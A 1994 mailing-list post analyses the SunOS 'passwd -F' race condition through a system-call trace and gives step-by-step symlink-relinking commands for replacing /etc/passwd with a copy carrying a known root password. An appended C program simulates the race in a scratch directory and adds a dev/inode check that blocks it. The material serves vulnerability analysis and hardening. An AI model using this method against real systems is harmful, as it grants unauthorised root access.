Re: Sun Patch Id #102060-01

der Mouse (mouse@Collatz.McRCIM.McGill.EDU)
Mon, 19 Dec 1994 04:30:38 -0500

> So does anybody know more about this one???  I've tried a few things,
> but haven't figured it out yet.  [...]

> Problem Description: 

>    1169007: Security: Root access possible on SunOS 4.1.x via forced passwd
>             race condition.

>    This patch restricts the use of the passwd command's -F option [...]

I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep
and ran "passwd -F /tmp/gleep" under the control of trc.  Here's the
trace, edited to emphasize the relevant excerpts:

	open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3
[this is the first time /tmp/gleep appears in the trace]
	fstat (3, 0xf7fff704) = 0
	read (3, 0xc708, 8192) = 448: [the passwd file]
	close (3) = 0
	gethostname (0x9ae0, 64) = 0: [our hostname]
	ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...]
	write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58
	access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory)
[I don't know how this may interact with shadow passwords.]
	open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3
	[catch SIGINT]
	[frob tty settings]
	[read new password]
	[do it all over again, for second copy of new password]
	[do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP]
	umask (0000) = 0022
	open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3
[experimentation indicates the directory portion is taken from
/tmp/gleep's directory portion]
	getdtablesize () = 64
	setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
	setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
	open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4
	fstat (4, 0xf7fff7dc) = 0
	read (4, 0xcb98, 8192) = 448: [the passwd file]
	fstat (3, 0xf7fff058) = 0
	read (4, 0xcb98, 8192) = 0: 
	close (4) = 0
	write (3, 0xeba0=[the passwd file with modified entry], 448) = 448
	close (3) = 0
	rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0

Thus, my idea of how one could exploit this [note: this is not an
exploit script!] would be:
	% mkdir bar
	% cp /etc/passwd bar
	[edit bar/passwd to have a known root password]
	% ln -s /etc foo
	% passwd -F $cwd/foo/passwd
Now, you need to relink foo to point to bar, somewhere between the open
of $cwd/foo/ptmp and the open of $cwd/foo/passwd, and then relink it
back before the rename() occurs.  If the passwd file is large, hitting
the second window may not be hard.

					der Mouse

			    mouse@collatz.mcrcim.mcgill.edu
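The following is an added example, not part of der Mouse's post and not SunOS code: a small C simulation of the traced sequence (open the target, create ptmp beside it, open the target again by path, write, rename) with the attacker's relinking of foo performed deterministically in the two windows the post identifies, so the race can be reproduced without timing luck. Every name in it (the scratch tree under /tmp, REALHASH, KNOWNHASH, NEWHASH, passwd_F, run_scenario) is made up for the demonstration. The `hardened` variant shows one way to close this particular double open: fstat the file on both opens and refuse to continue if the device/inode pair changed in between.

```c
/* Simulation of the "passwd -F" double-open race traced above.  Added illustration,
 * not SunOS code; all names, paths and hash strings (REALHASH, KNOWNHASH, NEWHASH) are made up. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define CHANGED_ENTRY "mouse:NEWHASH:100:100::/home/mouse:/bin/sh\n"

/* open + read (+ fstat) a file by path; 0 on success, -1 on error */
static int slurp(const char *path, char *buf, size_t cap, struct stat *st)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    buf[n < 0 ? 0 : n] = '\0';
    if (st) fstat(fd, st);
    close(fd);
    return n < 0 ? -1 : 0;
}

static void spew(const char *path, const char *s)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd >= 0) { if (write(fd, s, strlen(s)) < 0) perror(path); close(fd); }
}

/* Copy `in` to `out`, replacing the line that starts with "mouse:" (the user's entry) */
static void edit_entry(const char *in, char *out, size_t cap)
{
    const char *p = strstr(in, "mouse:");
    if (!p || (p != in && p[-1] != '\n')) { snprintf(out, cap, "%s", in); return; }
    const char *rest = strchr(p, '\n');
    rest = rest ? rest + 1 : p + strlen(p);
    snprintf(out, cap, "%.*s%s%s", (int)(p - in), in, CHANGED_ENTRY, rest);
}

/* Attacker hook: phase 1 = between open(ptmp) and the second open, phase 2 = before rename() */
typedef void (*attacker_fn)(int phase);

/* Mirrors the trace: read target, create ptmp in target's directory, read target AGAIN by
 * path, write the edited copy, rename over target.  hardened != 0 adds a dev/inode check. */
static int passwd_F(const char *target, int hardened, attacker_fn atk)
{
    char buf[4096], out[8192], dir[1024], tmp[1100];
    struct stat st1, st2;
    if (slurp(target, buf, sizeof buf, &st1) < 0) return -1;     /* first open of target */
    snprintf(dir, sizeof dir, "%s", target);
    snprintf(tmp, sizeof tmp, "%s/ptmp", dirname(dir));           /* ptmp beside target */
    int tfd = open(tmp, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (tfd < 0) return -1;
    if (atk) atk(1);                                              /* window 1 */
    if (slurp(target, buf, sizeof buf, &st2) < 0 ||               /* second open, by path again */
        (hardened && (st1.st_dev != st2.st_dev || st1.st_ino != st2.st_ino))) {
        close(tfd); unlink(tmp); return -1;       /* (demo: tmp may resolve elsewhere by now) */
    }
    edit_entry(buf, out, sizeof out);
    if (write(tfd, out, strlen(out)) < 0) { close(tfd); return -1; }
    close(tfd);
    if (atk) atk(2);                                              /* window 2 */
    return rename(tmp, target);
}

/* The attacker of the post: foo -> bar during window 1, back to foo -> etc during window 2 */
static void relink(int phase)
{
    unlink("foo");
    symlink(phase == 1 ? "bar" : "etc", "foo");
}

static void rm_tree(const char *base)   /* cwd is the scratch tree; remove it and leave */
{
    const char *n[] = { "foo", "etc/passwd", "etc/ptmp", "bar/passwd", "bar/ptmp" };
    for (size_t i = 0; i < 5; i++) unlink(n[i]);
    rmdir("etc"); rmdir("bar"); if (chdir("/") == 0) rmdir(base);
}

/* Build etc/passwd (REALHASH), bar/passwd (KNOWNHASH) and foo -> etc in a scratch tree, run
 * "passwd -F foo/passwd" with the attacker flipping foo; 1 if KNOWNHASH root entry landed in
 * etc/passwd, 0 if not, -1 on setup error. */
int run_scenario(int hardened)
{
    char base[] = "/tmp/ptmprace.XXXXXX", buf[4096];
    if (!mkdtemp(base) || chdir(base) < 0) return -1;
    mkdir("etc", 0755); mkdir("bar", 0755);
    spew("etc/passwd", "root:REALHASH:0:0::/:/bin/sh\nmouse:x:100:100::/home/mouse:/bin/sh\n");
    spew("bar/passwd", "root:KNOWNHASH:0:0::/:/bin/sh\nmouse:x:100:100::/home/mouse:/bin/sh\n");
    symlink("etc", "foo");                                  /* % ln -s /etc foo */
    passwd_F("foo/passwd", hardened, relink);               /* % passwd -F $cwd/foo/passwd */
    int hit = slurp("etc/passwd", buf, sizeof buf, NULL) == 0 && strstr(buf, "root:KNOWNHASH:") != NULL;
    rm_tree(base);
    return hit;
}

int main(void)
{
    printf("vulnerable: attacker's root entry installed = %d\n", run_scenario(0));
    printf("hardened:   attacker's root entry installed = %d\n", run_scenario(1));
    return 0;
}
```

Build with `cc -o ptmprace ptmprace.c` and run it: the vulnerable run reports 1 (the KNOWNHASH root entry is now in etc/passwd), the hardened run 0. The dev/inode comparison only closes the specific double open visible in the trace; it does not make it safe for a set-uid program to create and rename files in a directory chosen by the invoking user, which is why the patch simply restricts who may use -F.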